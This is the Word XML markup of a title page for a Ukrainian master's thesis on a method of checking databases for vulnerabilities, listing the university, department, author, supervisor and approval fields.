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668BA0" w14:textId="77777777" w:rsidR="009A35B5" w:rsidRPr="0061042F" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C077308" w14:textId="77777777" w:rsidR="009A35B5" w:rsidRPr="002425F2" w:rsidRDefault="009A35B5" w:rsidP="002425F2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002425F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>НАЦІОНАЛЬНИЙ АВІАЦІЙНИЙ УНІВЕРСИТЕТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01565D83" w14:textId="4BF3BA0B" w:rsidR="00B43131" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>КАФЕДРА</w:t>
      </w:r>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>КОМП’ЮТЕРИЗОВАНИХ СИСТЕМ ЗАХИСТУ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ІНФ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ОРМА</w:t>
      </w:r>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ЦІЇ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603527DD" w14:textId="72472A64" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3227C1" w14:textId="1FE19E97" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ДОПУСТИТИ ДО ЗАХИСТУ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DB7B6" w14:textId="77716740" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="008E5C9C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завідувач кафедри</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492E947" w14:textId="1BA3A7BF" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="008E5C9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>А.В. Ільєнко</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706712EA" w14:textId="3672C1C4" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B804BB3" w14:textId="0304F1A5" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> р.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6F6E5" w14:textId="592A929F" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5147D007" w14:textId="4B047675" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332043B6" w14:textId="77777777" w:rsidR="009A35B5" w:rsidRPr="0061042F" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:ind w:left="6120" w:right="-6"/>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На правах рукопису</w:t>
      </w:r>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D26BB7" w14:textId="77777777" w:rsidR="009A35B5" w:rsidRPr="0061042F" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:ind w:left="6120" w:right="-6"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061042F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>УДК 004.056.5:510.22(043.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05413F26" w14:textId="7E2ACDDA" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B281F01" w14:textId="5D3A381D" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8786B5" w14:textId="73477CE2" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188ECD9C" w14:textId="7970C125" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700FE5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>МАГІСТЕРСЬКА АТЕСТАЦІЙНА РОБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AEA006" w14:textId="473E027C" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F23613" w14:textId="65811DEA" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ВИП</w:t>
      </w:r>
      <w:r w:rsidR="00BF001C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>УСКНИКА</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ОСВІТНЬОГО СТУПЕНЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A94A9" w14:textId="19DD0C32" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«МАГІСТР»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029A8C3" w14:textId="693C2F6F" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F4930F" w14:textId="75BA8934" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1485B50C" w14:textId="687F57E9" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265F18A9" w14:textId="432661AC" w:rsidR="00700FE5" w:rsidRDefault="00700FE5" w:rsidP="00700FE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="993"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00700FE5">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Метод перевірки баз даних на вразливості</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9606" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7088"/>
        <w:gridCol w:w="2518"/>
      </w:tblGrid>
      <w:tr w:rsidR="005018F4" w14:paraId="6EB44C04" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E640859" w14:textId="77777777" w:rsidR="005018F4" w:rsidRDefault="005018F4" w:rsidP="00C10923">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="9356"/>
              </w:tabs>
              <w:spacing w:before="600"/>
              <w:ind w:right="550"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Автор:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EA0ED17" w14:textId="37882728" w:rsidR="005018F4" w:rsidRDefault="005018F4" w:rsidP="005018F4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="9356"/>
              </w:tabs>
              <w:spacing w:before="600"/>
              <w:ind w:right="-31"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>В.Ф. Михайловський</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005018F4" w14:paraId="5AD4C130" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D52C4B" w14:textId="77777777" w:rsidR="005018F4" w:rsidRPr="00556827" w:rsidRDefault="005018F4" w:rsidP="00C10923">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="9356"/>
              </w:tabs>
              <w:spacing w:before="600"/>
              <w:ind w:right="550"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">Науковий керівник: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>д.</w:t>
            </w:r>
            <w:r w:rsidRPr="00556827">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>ф-м.н.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>проф.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E10F005" w14:textId="77777777" w:rsidR="005018F4" w:rsidRDefault="005018F4" w:rsidP="00C10923">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="9356"/>
              </w:tabs>
              <w:spacing w:before="600"/>
              <w:ind w:right="550"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>О.В. Азаренко</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005018F4" w:rsidRPr="00556827" w14:paraId="7AA904F7" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F043251" w14:textId="77777777" w:rsidR="005018F4" w:rsidRDefault="005018F4" w:rsidP="00C10923">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="9356"/>
              </w:tabs>
              <w:spacing w:before="600"/>
              <w:ind w:right="550"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Нормоконтролер</w:t>
            </w:r>
            <w:r w:rsidRPr="00556827">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00556827">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>асистент</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0B2C22" w14:textId="77777777" w:rsidR="005018F4" w:rsidRPr="00556827" w:rsidRDefault="005018F4" w:rsidP="00C10923">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="9356"/>
              </w:tabs>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:before="600"/>
              <w:ind w:right="550"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556827">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>С.В. Єгоров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B4C6513" w14:textId="77777777" w:rsidR="009A35B5" w:rsidRPr="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="left" w:pos="6804"/>
          <w:tab w:val="left" w:pos="8789"/>
          <w:tab w:val="left" w:pos="9356"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EF1E47" w14:textId="556946C9" w:rsidR="009A35B5" w:rsidRDefault="009A35B5" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6096"/>
          <w:tab w:val="right" w:pos="9638"/>
        </w:tabs>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2401FC27" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766BD514" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D3776D" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABCD805" w14:textId="77777777" w:rsidR="008E5C9C" w:rsidRDefault="008E5C9C" w:rsidP="009A35B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5954"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
